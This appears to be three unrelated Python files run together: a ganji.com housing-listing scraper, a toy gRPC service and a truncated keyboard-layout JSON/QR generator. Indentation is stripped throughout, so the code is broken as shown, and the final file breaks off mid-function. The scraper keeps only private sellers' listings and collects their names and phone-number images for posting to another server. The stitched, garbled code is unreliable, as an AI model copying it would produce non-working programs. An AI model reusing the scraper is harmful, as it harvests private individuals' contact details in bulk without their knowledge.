#js resgx
self.xiaoqu_regex="xiaoqu : '(.*?)',"
self.address_regex="address : '(.*?)',"
self.house_room_regex="(\d+)室"
self.house_hall_regex="(\d+)厅"
self.house_toilet_regex="(\d+)卫"
self.house_veranda_regex="(\d+)阳台"
self.house_desc_regex="房屋概况</p>(.*?)</p>"
self.house_floor_regex="<li>楼层: 第(\d+)层/总(\d+)层</li>"
self.house_totalarea_regex="<li>面积: (\d+) ㎡</li>"
self.house_totalarea_regex_qiu="(\d+)㎡"
self.house_type_regex3="<li>户型: (.*)</li>"
self.house_toward_regex="<li>朝向: (.*)</li>"
self.house_type_regex="<li>类型: (.*)</li>"
self.cityarea_regex="<li>区域:([\s\S]*?)</li>"
self.house_age_regex="<li>房龄: (\d+) 年</li>"
self.house_fitment_regex="<li>装修: (.*)</li>"
self.house_support_regex="<li>配置: (.*) </li>"
self.house_price_regex="<li>售价: <span>(.*)</span>.*</li>"
self.house_price_regex_2="<li>租金: <span>(.*)</span>.*</li>"
self.borough_name_regex="<li>小区:(.*)</li>"
self.house_deposit_regex="<li>租金: (.*)</li>"
self.house_price_regex_zu = "<li>期望租金: (.*)</li>"
self.borough_name_regex_reg = "<li>期望小区: (.*)</li>"
self.house_addr_regex_reg = "<li>小区地址:(.*)</li>"
self.house_price_regex_gou = "<li>期望售价: (.*)</li>"
def __addText(self,tag, no_tail=False):
text = []
if tag.text:
text.append(tag.text)
for child in tag.getchildren():
text.append(self.__addText(child))
if not no_tail and tag.tail:
text.append(tag.tail)
return "".join(text)
def getText(self,html):
text=[]
for tag in html:
text.append(self.__addText(tag, no_tail=True))
return ' '.join([t.strip() for t in text if t.strip()])
def mayGetIt(self,page):
try:
href=PyQuery(page)("a.userHistory").attr("href")
if href==None:
return False
href="http://%s.ganji.com%s"%(self.citycode,href)
resp = urllib2.urlopen(urllib2.Request(href, None, self.header)).read()
trs=PyQuery(resp)("table.tel_list tr")
except:
return True
# print "user list-------->%s| %s"%((len(trs)-1),self.urls)
if len(trs)-1>int(self.upc):
return True
else:
return False
def sell(self,url):
request = urllib2.Request(url, None, self.header)
response = urllib2.urlopen(request).read()
if self.mayGetIt(response):
self.fd={}
raise
tree = etree.HTML(response)
soup =BeautifulSoup(response)
self.fd['house_flag'] = 1
self.fd['house_belong']=0
self.fd['owner_phone']=''
self.fd['house_area_max']=0
self.fd['house_price_max']=''
detail_mer = soup.find('div',{'class':'detail_mer'})
#非个人房源 return
if u"个人房源" not in str(detail_mer):raise
Dname = detail_mer.find('span',{'class':'Dname'})
if Dname:
self.fd['owner_name'] = str(Dname.string)
else:
self.fd['owner_name'] = None
ganji_phone_call_class = detail_mer.find('span',{'class':'ganji_phone_call_class'})
if ganji_phone_call_class:
self.fd['owner_phone_pic'] = ganji_phone_call_class.contents[0]
if str(ganji_phone_call_class).find('src='):
self.fd['owner_phone_pic'] = 'http://'+urlparse(url)[1]+ganji_phone_call_class.img['src']
else:
self.fd['owner_phone_pic'] = None
else:
self.fd['owner_phone_pic'] = None
#没有联系方式 return
if not self.fd['owner_phone_pic']:raise
if re.search("<span class=\"city\"><a .*?>(.*?)</a>", response):
cityname=re.search("<span class=\"city\"><a .*?>(.*?)</a>", response).group(1)
self.fd['cityname'] = cityname
else:
raise
if re.search(self.house_floor_regex, response):
house_floor=re.search(self.house_floor_regex, response).group(1)
house_topfloor=re.search(self.house_floor_regex, response).group(2)
self.fd['house_floor'] = int(house_floor)
self.fd['house_topfloor'] = int(house_topfloor)
else:
self.fd['house_floor'] = 0
self.fd['house_topfloor'] = 0
if re.search(self.house_totalarea_regex, response):
house_totalarea=re.search(self.house_totalarea_regex, response).group(1)
self.fd['house_area'] = int(house_totalarea)
else:
self.fd['house_area'] = 0
#类型
if re.search(self.house_type_regex, response):
house_type=re.search(self.house_type_regex, response).group(1)
self.fd['house_type'] = housetype(house_type)
else:
self.fd['house_type'] = 6
if re.search(self.house_price_regex, response):
house_price=re.search(self.house_price_regex, response).group(1)
if house_price=="面议":
house_price=0
self.fd['house_price'] = int(house_price)
else:
self.fd['house_price'] = 0
#posttime=CSSSelector('span.pub_time')(tree)!=None and CSSSelector('span.pub_time')(tree)[0].text.strip() or None
#if posttime:
#Y=int(time.strftime('%Y', time.localtime()))
#M=int(posttime.split(' ')[0].split('-')[0])
#D=int(posttime.split(' ')[0].split('-')[1])
#s = datetime.datetime(Y,M,D,0,0)
#posttime=int(time.mktime(s.timetuple()))
#self.fd['house_posttime'] =posttime
#else:
#self.fd['house_posttime'] =None
if re.search(self.house_room_regex, response):
house_room=re.search(self.house_room_regex, response).group(1)
self.fd['house_room'] = int(house_room)
else:
self.fd['house_room'] = 0
if re.search(self.house_hall_regex, response):
house_hall=re.search(self.house_hall_regex, response).group(1)
self.fd['house_hall'] = int(house_hall)
else:
self.fd['house_hall'] = 0
if re.search(self.house_toilet_regex, response):
house_toilet=re.search(self.house_toilet_regex, response).group(1)
self.fd['house_toilet'] = int(house_toilet)
else:
self.fd['house_toilet'] = 0
if re.search(self.house_veranda_regex, response):
house_veranda=re.search(self.house_veranda_regex, response).group(1)
self.fd['house_veranda'] = int(house_veranda)
else:
self.fd['house_veranda'] = 0
house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
self.fd['house_title'] = house_title.replace("(求购)","").replace("(求租)","").replace("(出售)","")
#描述
detail_box = soup.find('div',{'class':'detail_box'})
if detail_box:
house_desc = str(detail_box('p')[1])
self.fd['house_desc'] = re.sub("<.*?>|\n|\r|\t|联系我时请说明是从赶集网上看到的","",house_desc)
else:
self.fd['house_desc'] = ""
d_i = soup.find('ul',{'class':'d_i'})
#小区名
#先处理JS
if re.search(self.xiaoqu_regex, response):
borough_name=re.search(self.xiaoqu_regex, response).group(1)
self.fd['borough_name'] = borough_name
if re.search(self.address_regex, response):
house_addr=re.search(self.address_regex, response).group(1)
self.fd['house_addr'] = house_addr
else:
if d_i.find(text="小区: "):
borough_box = d_i.find(text="小区: ").parent
borough_name = borough_box.find("a")
if borough_name:
self.fd['borough_name'] = str(borough_name.string)
else:
self.fd['borough_name'] = None
#地址
if borough_name and borough_name.nextSibling:
house_addr = borough_name.nextSibling.string
self.fd['house_addr'] = re.sub("\(|\)| ","",house_addr)
else:
self.fd['house_addr'] = ""
else:
if re.search(self.borough_name_regex, response):
borough_name=re.search(self.borough_name_regex, response).group(1)
self.fd['borough_name'] = re.sub("\(.*\)| ","",borough_name)
#区域
area_box = d_i.find(text="区域: ").parent
area_a = area_box('a')
if area_a and len(area_a)>1:
self.fd['house_region'] = str(area_a[0].string)
self.fd['house_section'] = str(area_a[1].string)
elif area_a and len(area_a)==1:
self.fd['house_region'] = str(area_a[0].string)
self.fd['house_section'] = ""
else:
self.fd['house_region'] = ""
self.fd['house_section'] = ""
if re.search(self.house_age_regex, response):
house_age=re.search(self.house_age_regex, response).group(1)
Y=int(time.strftime('%Y', time.localtime()))
house_age=Y-int(house_age)
self.fd['house_age'] = house_age
else:
self.fd['house_age'] = 0
#朝向
if re.search(self.house_toward_regex, response):
house_toward=re.search(self.house_toward_regex, response).group(1)
self.fd['house_toward'] = toward(house_toward)
else:
self.fd['house_toward'] = 0
if re.search(self.house_fitment_regex, response):
house_fitment=re.search(self.house_fitment_regex, response).group(1)
self.fd['house_fitment'] = fitment(house_fitment)
else:
self.fd['house_fitment'] = 2
request = None
response = None
soup=None
tree=None
del tree
del request
del response
del soup
def buy(self,url):
self.fd['house_city'] = self.citycode
self.fd['house_flag'] = 3
# self.fd['belong']="1"
request = urllib2.Request(url, None, self.header)
response = urllib2.urlopen(request).read()
if self.mayGetIt(response):
self.fd={}
raise
tree = etree.HTML(response)
soup =BeautifulSoup(response)
detail_mer = soup.find('div',{'class':'detail_mer'})
#非个人房源 return
if u"个人房源" not in str(detail_mer):raise
Dname = detail_mer.find('span',{'class':'Dname'})
if Dname:
self.fd['owner_name'] = str(Dname.string)
else:
self.fd['owner_name'] = ""
ganji_phone_call_class = detail_mer.find('span',{'class':'ganji_phone_call_class'})
if ganji_phone_call_class:
self.fd['owner_phone_pic'] = ganji_phone_call_class.contents[0]
if str(ganji_phone_call_class).find('src='):
self.fd['owner_phone_pic'] = 'http://'+urlparse(url)[1]+ganji_phone_call_class.img['src']
else:
self.fd['owner_phone_pic'] = ""
else:
self.fd['owner_phone_pic'] = ""
#没有联系方式 return
if not self.fd['owner_phone_pic']:raise
if re.search("<span class=\"city\"><a .*?>(.*?)</a>", response):
cityname=re.search("<span class=\"city\"><a .*?>(.*?)</a>", response).group(1)
self.fd['cityname'] = cityname
else:
raise
self.fd['house_floor'] = 0
self.fd['house_topfloor'] = 0
self.fd['house_type'] = 6
self.fd['house_age'] = 0
self.fd['house_toward'] = 0
self.fd['house_fitment'] = 0
if re.search(self.house_totalarea_regex_qiu, response):
house_totalarea=re.search(self.house_totalarea_regex_qiu, response).group(1)
self.fd['house_area_max'] = int(house_totalarea)
self.fd['house_area'] = int(house_totalarea)
else:
self.fd['house_area'] = 0
self.fd['house_area_max'] = 0
if re.search(self.house_price_regex_gou, response):
house_price_zu = re.search(self.house_price_regex_gou, response).group(1)
house_price_zu = house_price_zu.replace('万','')
if house_price_zu.find("以上") != -1:
self.fd['house_price_max'] = 0
self.fd['house_price'] = int(house_price_zu.replace('以上',''))
elif house_price_zu.find("以下") != -1:
self.fd['house_price_max'] = int(house_price_zu.replace('以下',''))
self.fd['house_price'] = 0
elif house_price_zu.find("-") != -1:
self.fd['house_price_max'] = int(house_price_zu.split('-')[1])
self.fd['house_price'] = int(house_price_zu.split('-')[0])
else:
self.fd['house_price_max'] = 0
self.fd['house_price'] = 0
else:
self.fd['house_price_max'] = 0
self.fd['house_price'] = 0
posttime=CSSSelector('span.pub_time')(tree)!=None and CSSSelector('span.pub_time')(tree)[0].text.strip() or None
if posttime:
Y=int(time.strftime('%Y', time.localtime()))
M=int(posttime.split(' ')[0].split('-')[0])
D=int(posttime.split(' ')[0].split('-')[1])
H=int(time.strftime('%H',time.localtime(time.time())))
Min=int(time.strftime('%M',time.localtime(time.time())))
s = datetime.datetime(Y,M,D,H,Min)
posttime=str(int(time.mktime(s.timetuple())))
self.fd['house_posttime'] =posttime
else:
s=time.localtime(time.time())
self.fd['house_posttime'] =str(int(time.mktime(s)))
if re.search(self.house_room_regex, response):
house_room=re.search(self.house_room_regex, response).group(1)
self.fd['house_room'] = int(house_room)
else:
self.fd['house_room'] = 0
if re.search(self.house_hall_regex, response):
house_hall=re.search(self.house_hall_regex, response).group(1)
self.fd['house_hall'] = int(house_hall)
else:
self.fd['house_hall'] = 0
if re.search(self.house_toilet_regex, response):
house_toilet=re.search(self.house_toilet_regex, response).group(1)
self.fd['house_toilet'] = int(house_toilet)
else:
self.fd['house_toilet'] = 0
if re.search(self.house_veranda_regex, response):
house_veranda=re.search(self.house_veranda_regex, response).group(1)
self.fd['house_veranda'] = int(house_veranda)
else:
self.fd['house_veranda'] = 0
house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
self.fd['house_title'] = house_title
#描述
detail_box = soup.find('div',{'class':'detail_box'})
if detail_box:
house_desc = str(detail_box('p')[1])
self.fd['house_desc'] = re.sub("<.*?>|\n|\r|\t|联系我时请说明是从赶集网上看到的","",house_desc)
else:
self.fd['house_desc'] = None
d_i = soup.find('ul',{'class':'d_i'})
#小区名
#先处理JS
if re.search(self.xiaoqu_regex, response):
borough_name=re.search(self.xiaoqu_regex, response).group(1)
self.fd['borough_name'] = borough_name
if re.search(self.address_regex, response):
house_addr=re.search(self.address_regex, response).group(1)
self.fd['house_addr'] = house_addr
else:
if d_i.find(text="小区: "):
borough_box = d_i.find(text="小区: ").parent
borough_name = borough_box.find("a")
if borough_name:
self.fd['borough_name'] = borough_name.string
else:
self.fd['borough_name'] = None
else:
if re.search(self.borough_name_regex_reg, response):
borough_name=re.search(self.borough_name_regex_reg, response).group(1)
self.fd['borough_name'] = borough_name
if re.search(self.house_addr_regex_reg, response):
house_addr=re.search(self.house_addr_regex_reg, response).group(1)
self.fd['house_addr'] = house_addr
else:
self.fd['house_addr'] = ''
#区域
area_box = d_i.find(text="区域: ").parent
area_a = area_box('a')
if area_a and len(area_a)>1:
self.fd['house_region'] = str(area_a[0].string)
self.fd['house_section'] = str(area_a[1].string)
elif area_a and len(area_a)==1:
self.fd['house_region'] = str(area_a[0].string)
self.fd['house_section'] = ""
else:
self.fd['house_region'] = ""
self.fd['house_section'] = ""
request = None
response = None
soup=None
tree=None
del tree
del request
del response
del soup
def rent(self,url):
# self.fd['house_city'] = urlparse(url)[1].replace('.ganji.com',"")
hc= urlparse(url)[1].replace('.ganji.com',"")
hc2=citynameDict_sf.get(hc)
if hc2:
self.fd['house_city']=hc2
else:
self.fd['house_city']=hc
request = urllib2.Request(url, None, self.header)
response = urllib2.urlopen(request).read()
if self.mayGetIt(response):
self.fd={}
raise
tree = etree.HTML(response)
if re.search("<span class=\"city\"><a .*?>(.*?)</a>", response):
cityname=re.search("<span class=\"city\"><a .*?>(.*?)</a>", response).group(1)
self.fd['cityname'] = cityname
else:
raise
self.fd['house_flag'] = 2
self.fd['house_type'] = 6
self.fd['house_floor'] = 0
self.fd['house_topfloor'] = 0
soup =BeautifulSoup(response)
detail_mer = soup.find('div',{'class':'detail_mer'})
#非个人房源 return
if u"个人房源" not in str(detail_mer):raise
Dname = detail_mer.find('span',{'class':'Dname'})
if Dname:
self.fd['owner_name'] = str(Dname.string)
else:
self.fd['owner_name'] = ""
ganji_phone_call_class = detail_mer.find('span',{'class':'ganji_phone_call_class'})
if ganji_phone_call_class:
self.fd['owner_phone_pic'] = ganji_phone_call_class.contents[0]
if str(ganji_phone_call_class).find('src='):
self.fd['owner_phone_pic'] = 'http://'+urlparse(url)[1]+ganji_phone_call_class.img['src']
else:
self.fd['owner_phone_pic'] = None
else:
self.fd['owner_phone_pic'] = None
#没有联系方式 return
if not self.fd['owner_phone_pic']:raise
if re.search(self.house_totalarea_regex, response):
house_totalarea=re.search(self.house_totalarea_regex, response).group(1)
self.fd['house_area'] = house_totalarea
else:
self.fd['house_area'] = None
if re.search(self.house_price_regex_2, response):
house_price=re.search(self.house_price_regex_2, response).group(1)
if house_price=="面议":
house_price=0
self.fd['house_price'] = int(house_price)
else:
self.fd['house_price'] = 0
# house_price=tree.xpath("/html/body/div[2]/div/div/ul/li/span") and tree.xpath("/html/body/div[2]/div/div/ul/li/span")[0].text.strip() or None
# v['house_price'] = house_price
posttime=CSSSelector('span.pub_time')(tree)!=None and CSSSelector('span.pub_time')(tree)[0].text.strip() or None
if posttime:
Y=int(time.strftime('%Y', time.localtime()))
M=int(posttime.split(' ')[0].split('-')[0])
D=int(posttime.split(' ')[0].split('-')[1])
H=int(time.strftime('%H',time.localtime(time.time())))
Min=int(time.strftime('%M',time.localtime(time.time())))
s = datetime.datetime(Y,M,D,H,Min)
posttime=str(int(time.mktime(s.timetuple())))
self.fd['house_posttime'] =posttime
else:
s=time.localtime(time.time())
self.fd['house_posttime'] =str(int(time.mktime(s)))
house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
self.fd['house_title'] = house_title.replace("(求购)","").replace("(求租)","").replace("(出售)","")
if re.search(self.house_room_regex, response):
house_room=re.search(self.house_room_regex, response).group(1)
self.fd['house_room'] = house_room
else:
self.fd['house_room'] = 0
if re.search(self.house_hall_regex, response):
house_hall=re.search(self.house_hall_regex, response).group(1)
self.fd['house_hall'] = house_hall
else:
self.fd['house_hall'] = 0
if re.search(self.house_toilet_regex, response):
house_toilet=re.search(self.house_toilet_regex, response).group(1)
self.fd['house_toilet'] = house_toilet
else:
self.fd['house_toilet'] = 0
if re.search(self.house_veranda_regex, response):
house_veranda=re.search(self.house_veranda_regex, response).group(1)
self.fd['house_veranda'] = house_veranda
else:
self.fd['house_veranda'] = 0
if re.search(self.house_floor_regex, response):
house_floor=re.search(self.house_floor_regex, response).group(1)
house_topfloor=re.search(self.house_floor_regex, response).group(2)
self.fd['house_floor'] = int(house_floor)
self.fd['house_topfloor'] = int(house_topfloor)
else:
self.fd['house_floor'] = 0
self.fd['house_topfloor'] = 0
house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
self.fd['house_title'] = house_title.replace("(求购)","").replace("(求租)","").replace("(出售)","")
#描述
detail_box = soup.find('div',{'class':'detail_box'})
if detail_box:
house_desc = str(detail_box('p')[1])
self.fd['house_desc'] = re.sub("<.*?>|\n|\r|\t|联系我时请说明是从赶集网上看到的","",house_desc)
else:
self.fd['house_desc'] = None
d_i = soup.find('ul',{'class':'d_i'})
#小区名
#先处理JS
if re.search(self.xiaoqu_regex, response):
borough_name=re.search(self.xiaoqu_regex, response).group(1)
self.fd['borough_name'] = borough_name
if re.search(self.address_regex, response):
house_addr=re.search(self.address_regex, response).group(1)
self.fd['house_addr'] = house_addr
else:
if d_i.find(text="小区: "):
borough_box = d_i.find(text="小区: ").parent
borough_name = borough_box.find("a")
if borough_name:
self.fd['borough_name'] = borough_name.string
else:
self.fd['borough_name'] = None
#地址
if borough_name and borough_name.nextSibling:
house_addr = borough_name.nextSibling.string
self.fd['house_addr'] = re.sub("\(|\)| ","",house_addr)
else:
self.fd['house_addr'] = None
else:
if re.search(self.borough_name_regex, response):
borough_name=re.search(self.borough_name_regex, response).group(1)
self.fd['borough_name'] = re.sub("\(.*\)| ","",borough_name)
#区域
area_box = d_i.find(text="区域: ").parent
area_a = area_box('a')
if area_a and len(area_a)>1:
self.fd['house_region'] = str(area_a[0].string)
self.fd['house_section'] = str(area_a[1].string)
elif area_a and len(area_a)==1:
self.fd['house_region'] = str(area_a[0].string)
self.fd['house_section'] = ""
else:
self.fd['house_region'] = ""
self.fd['house_section'] = ""
if re.search(self.house_age_regex, response):
house_age=re.search(self.house_age_regex, response).group(1)
Y=int(time.strftime('%Y', time.localtime()))
house_age=Y-int(house_age)
self.fd['house_age'] = house_age
else:
self.fd['house_age'] = 0
#朝向
if re.search(self.house_toward_regex, response):
house_toward=re.search(self.house_toward_regex, response).group(1)
self.fd['house_toward'] = toward(house_toward)
else:
self.fd['house_toward'] = 0
if re.search(self.house_fitment_regex, response):
house_fitment=re.search(self.house_fitment_regex, response).group(1)
self.fd['house_fitment'] = fitment(house_fitment)
else:
self.fd['house_fitment'] = 2
if re.search(self.house_deposit_regex, response):
house_deposit=re.search(self.house_deposit_regex, response).group(1)
self.fd['house_deposit'] = deposit(house_deposit)
else:
self.fd['house_deposit'] = None
request = None
response = None
soup=None
tree=None
del tree
del request
del response
del soup
def require(self,url):
hc= urlparse(url)[1].replace('.ganji.com',"")
hc2=citynameDict_sf.get(hc)
if hc2:
self.fd['house_city']=hc2
else:
self.fd['house_city']=hc
request = urllib2.Request(url, None, self.header)
response = urllib2.urlopen(request).read()
if self.mayGetIt(response):
self.fd={}
raise
tree = etree.HTML(response)
if re.search("<span class=\"city\"><a .*?>(.*?)</a>", response):
cityname=re.search("<span class=\"city\"><a .*?>(.*?)</a>", response).group(1)
self.fd['cityname'] = cityname
else:
raise
self.fd['house_flag'] = 4
self.fd['house_type'] = 6
self.fd['house_floor'] = 0
self.fd['house_topfloor'] = 0
self.fd['house_area']=0
self.fd['house_age'] = 0
self.fd['house_toward'] = 0
self.fd['house_fitment'] = 0
self.fd['house_deposit'] = 0
# self.fd['house_totalarea_max'] = 0
# self.fd['house_totalarea_min'] = 0
soup =BeautifulSoup(response)
detail_mer = soup.find('div',{'class':'detail_mer'})
#非个人房源 return
if u"个人房源" not in str(detail_mer):raise
Dname = detail_mer.find('span',{'class':'Dname'})
if Dname:
self.fd['owner_name'] = Dname.string
else:
self.fd['owner_name'] = None
ganji_phone_call_class = detail_mer.find('span',{'class':'ganji_phone_call_class'})
if ganji_phone_call_class:
self.fd['owner_phone_pic'] = ganji_phone_call_class.contents[0]
if str(ganji_phone_call_class).find('src='):
self.fd['owner_phone_pic'] = 'http://'+urlparse(url)[1]+ganji_phone_call_class.img['src']
else:
self.fd['owner_phone_pic'] = None
else:
self.fd['owner_phone_pic'] = None
#没有联系方式 return
if not self.fd['owner_phone_pic']:raise
if re.search(self.house_price_regex_zu, response):
house_price_zu = re.search(self.house_price_regex_zu, response).group(1)
house_price_zu = house_price_zu.replace('元/月','')
if house_price_zu.find("以上") != -1:
self.fd['house_price_max'] = 0
self.fd['house_price'] = int(house_price_zu.replace('以上',''))
elif house_price_zu.find("以下") != -1:
self.fd['house_price_max'] = int(house_price_zu.replace('以下',''))
self.fd['house_price'] = 0
elif house_price_zu.find("-") != -1:
self.fd['house_price_max'] = int(house_price_zu.split('-')[1])
self.fd['house_price'] = int(house_price_zu.split('-')[0])
else:
self.fd['house_price_max'] = 0
self.fd['house_price'] = 0
else:
self.fd['house_price_max'] = 0
self.fd['house_price'] = 0
posttime=CSSSelector('span.pub_time')(tree)!=None and CSSSelector('span.pub_time')(tree)[0].text.strip() or None
if posttime:
Y=int(time.strftime('%Y', time.localtime()))
M=int(posttime.split(' ')[0].split('-')[0])
D=int(posttime.split(' ')[0].split('-')[1])
H=int(time.strftime('%H',time.localtime(time.time())))
Min=int(time.strftime('%M',time.localtime(time.time())))
s = datetime.datetime(Y,M,D,H,Min)
posttime=str(int(time.mktime(s.timetuple())))
self.fd['house_posttime'] =posttime
else:
s=time.localtime(time.time())
self.fd['house_posttime'] =str(int(time.mktime(s)))
house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
self.fd['house_title'] = house_title.replace("(求购)","").replace("(求租)","").replace("(出售)","")
if re.search(self.house_room_regex, response):
house_room=re.search(self.house_room_regex, response).group(1)
self.fd['house_room'] = int(house_room)
else:
self.fd['house_room'] = 0
if re.search(self.house_hall_regex, response):
house_hall=re.search(self.house_hall_regex, response).group(1)
self.fd['house_hall'] = int(house_hall)
else:
self.fd['house_hall'] = 0
if re.search(self.house_toilet_regex, response):
house_toilet=re.search(self.house_toilet_regex, response).group(1)
self.fd['house_toilet'] = int(house_toilet)
else:
self.fd['house_toilet'] = 0
if re.search(self.house_veranda_regex, response):
house_veranda=re.search(self.house_veranda_regex, response).group(1)
self.fd['house_veranda'] = int(house_veranda)
else:
self.fd['house_veranda'] = 0
house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
self.fd['house_title'] = house_title.replace("(求购)","").replace("(求租)","").replace("(出售)","")
#描述
detail_box = soup.find('div',{'class':'detail_box'})
if detail_box:
house_desc = str(detail_box('p')[1])
self.fd['house_desc'] = re.sub("<.*?>|\n|\r|\t|联系我时请说明是从赶集网上看到的","",house_desc)
else:
self.fd['house_desc'] = ""
d_i = soup.find('ul',{'class':'d_i'})
#小区名
#先处理JS
if re.search(self.xiaoqu_regex, response):
borough_name=re.search(self.xiaoqu_regex, response).group(1)
self.fd['borough_name'] = borough_name
if re.search(self.address_regex, response):
house_addr=re.search(self.address_regex, response).group(1)
self.fd['house_addr'] = house_addr
else:
if re.search(self.borough_name_regex_reg, response):
borough_name=re.search(self.borough_name_regex_reg, response).group(1)
self.fd['borough_name'] = borough_name
if re.search(self.house_addr_regex_reg, response):
house_addr=re.search(self.house_addr_regex_reg, response).group(1)
self.fd['house_addr'] = house_addr
else:
self.fd['house_addr'] = ''
#区域
area_box = d_i.find(text="区域: ").parent
area_a = area_box('a')
if area_a and len(area_a)>1:
self.fd['house_region'] = str(area_a[0].string)
self.fd['house_section'] = str(area_a[1].string)
elif area_a and len(area_a)==1:
self.fd['house_region'] = str(area_a[0].string)
self.fd['house_section'] = ""
else:
self.fd['house_region'] = ""
self.fd['house_section'] = ""
request = None
response = None
soup=None
tree=None
del tree
del request
del response
del soup
def extractDict(self):
if checkPath(homepath,self.folder,self.urls):
pass
else:
try:
if self.kind=="1":
self.sell(self.urls)
elif self.kind=="2":
self.rent(self.urls)
elif self.kind=="3":
self.buy(self.urls)
else:
self.require(self.urls)
makePath(homepath,self.folder,self.urls)
#超过七天
# if (time.time() -self.fd["posttime"]) > 7*24*36000:return
except Exception,e:
self.fd['house_title']=None
msglogger.info("%s 链接采集异常"%self.urls)
# print "%s||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||"%self.urls
if isDEV:
# self.fd.update(getDefaultVal(4))
dfv=getDefaultVal(self.kind)
for item in dfv.items() :
# print item[0],item[1]
if item[0] not in self.fd:
self.fd[item[0]]=dfv.get(item[0])
for item in dfv.items() :
print item[0],self.fd[item[0]],type(self.fd[item[0]])
return
else:
dfv=getDefaultVal(self.kind)
for item in dfv.items() :
# print item[0],item[1]
if item[0] not in self.fd:
self.fd[item[0]]=dfv.get(item[0])
self.fd["is_checked"] = 1
self.fd["web_flag"] = "gj"
#print "%s %s %s %s %s"%(("%s.soufun.com"% self.citycode),self.citycode, self.kind ,time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(time.time())), self.urls)
return self.fd
if not self.fd["is_checked"]:
for i in self.fd.items():
print i[0],i[1]
print "*"*80
# if len(self.fd)==7 or len(self.fd)==17:
# print "#####################################"
# continue
# req=urllib2.Request("http://site.jjr360.com/app.php", urllib.urlencode(self.fd))
# p=self.br.open(req).read().strip()
# print p.decode('gbk')
# print "*"*80
class fetchData(threading.Thread):
def __init__(self,d):
threading.Thread.__init__(self)
self.d=d
def run(self):
lc=LinkCrawl(self.d["citycode"],self.d["kind"])
clinks=lc.runme()
cc=ContentCrawl(clinks,self.d["citycode"],self.d["kind"])
cc.extractDict()
class getLinksThread(threading.Thread):
def __init__(self,d):
threading.Thread.__init__(self)
self.d=d
def run(self):
gc.enable()
lc=LinkCrawl(self.d["citycode"],self.d["kind"])
lc.runme()
del gc.garbage[:]
def getLinks(d):
lc=LinkCrawl(d["citycode"],d["kind"],d["st1"])
while True:
lc.runme()
del gc.garbage[:]
time.sleep(int(d["st2"]))
def getContent(clinks,citycode,kind,upc):
# return
cc=ContentCrawl(clinks,citycode,kind,upc)
fd=cc.extractDict()
res=""
try:
res=postHost(fd)
except Exception,e:
res=e
print res
msglogger.info("%s|%s|%s"%(clinks,res,fd))
del gc.garbage[:]
if __name__=="__main__":
# lc=LinkCrawl(citycode="su",kind="1")
# lc.runme()#
#url1 = "http://su.ganji.com/fang5/11071015_233901.htm"
#url2 = "http://su.ganji.com/fang1/11071017_418972.htm"
#url3 = "http://su.ganji.com/fang4/11062413_4152.htm"
#url4 = "http://su.ganji.com/fang2/11070900_21214.htm"
# cc=ContentCrawl("http://su.ganji.com/fang2/11071417_21820.htm",citycode="su",kind="4",upc=0)
cc=ContentCrawl("http://su.ganji.com/fang5/tuiguang-4269169.htm",citycode="su",kind="1",upc=0)
cc.extractDict()
# while 1:
# for i in range(1,5):
# k = "%s" % str(i)
# try:
# lc=LinkCrawl(citycode="su",kind=k)
# clinks=lc.runme()
# cc=ContentCrawl(clinks,citycode="su",kind=k)
# cc.extractDict()
# except:
# pass
|
from typing import Dict, Iterator, Union
from grpc import RpcContext
from optionalgrpc.service import Service
from my_foo_project.client import foo_pb2_grpc, foo_pb2
@Service(rpc_servicer = foo_pb2_grpc.add_FooServicer_to_server,
stub = foo_pb2_grpc.FooStub,
port = 1000)
class Foo(foo_pb2_grpc.FooServicer):
def __init__(self, configs: Dict[str, Union[int, str]], server:bool = False, use_rpc: bool = False):
self.configs = configs
self.server = server
self.use_rpc = use_rpc
def sendUnary(self, request: foo_pb2.MyMessage, context: RpcContext = None) -> foo_pb2.MyMessage:
msg_num = request.num
msg_contents = request.contents
total_num_messages = 1
message_char_length = len(msg_contents)
resp = "Received message. It had number: {0}. It had {1} characters.".format(msg_num,
message_char_length)
return foo_pb2.MyMessage(num = total_num_messages, contents = resp)
def sendStream(self, request_iterator: Iterator[foo_pb2.MyMessage], context: RpcContext = None) -> foo_pb2.MyMessage:
total_num_messages = 0
message_sum = 0
message_char_length = 0
for msg in request_iterator:
msg_num = msg.num
msg_contents = msg.contents
total_num_messages += 1
message_sum += msg_num
message_char_length += len(msg_contents)
resp = "Received: {0} messages. They add up to: {1}. They had {2} characters.".format(total_num_messages,
message_sum,
message_char_length)
return foo_pb2.MyMessage(num = total_num_messages, contents = resp)
def sendBiStream(self, request_iterator: Iterator[foo_pb2.MyMessage], context: RpcContext = None) -> Iterator[foo_pb2.MyMessage]:
for msg in request_iterator:
msg_num = msg.num
msg_contents = msg.contents
yield foo_pb2.MyMessage(num = msg_num, contents = "Received: {0}".format(msg_contents))
|
import os.path
import shutil
from collections import OrderedDict
from .base import Generator, run_process
from ..base import get_logger
import json
logger = get_logger(__file__)
class JSONGenerator(Generator):
def generate(self, base="."):
out_dir = os.path.abspath(base)
os.makedirs(out_dir, exist_ok=True)
fn = os.path.join(out_dir, "%s.json" % self._project.internal_name)
layouts = OrderedDict()
for name, layout in self._project.layouts.items():
layouts[layout.internal_name] = layout._tree
with open(fn, "w") as f:
json.dump({"layouts": layouts}, f, indent=2, ensure_ascii=False)
class QRGenerator(Generator):
def generate(self, base="."):
if not shutil.which("qrencode"):
logger.error("`qrencode` not found on PATH.")
return
for name, layout in self._project.layouts.items():
logger.info("Choosing first layout from project: %s" % name)
tree = layout._tree
break
o = {
"name": layout.native_display_name,
"space": tree["strings"]["space"],
"enter": tree["strings"]["return"],
"normal": tree["modes"]["mobile-default"],
"shifted": tree["modes"]["mobile-shift"],
"longPress": tree["longpress"]
}
data = json.dumps(o, ensure_ascii=False, separators=(',', ':'))
logger.debug(data)
fn_path = os.path.abspath(os.path.join(base, "%s.png" % name))
